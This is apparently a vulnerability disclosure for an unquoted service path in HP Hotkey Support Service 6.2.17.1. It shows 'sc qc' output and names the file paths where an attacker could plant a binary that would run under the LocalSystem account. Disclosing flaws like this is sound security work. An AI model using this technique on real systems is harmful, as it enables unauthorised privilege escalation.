# Exploit Title: [HP Hotkey Support Service - Unquoted Service Path Privilege Escalation] # Date: [date] # Exploit Author: [Owais Mehtab, Tayeeb Rana] # Vendor Homepage: [http://www.hp.com/] # Software Link: [http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_129672_1] # Version: [6.2.17.1] # Tested on: [Win7 Sp1] C:\>sc qc "HP Hotkey Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HP Hotkey Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : D:\Program Files (x86)\HP\HP Hotkey Support\HotkeyService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HP Hotkey Service DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem An attacker can place binaries in following locations to execute it under LocalSystem account since the binary path is not in double quotes D:\Program.exe D:\Program Files (x86)\HP\HP.exe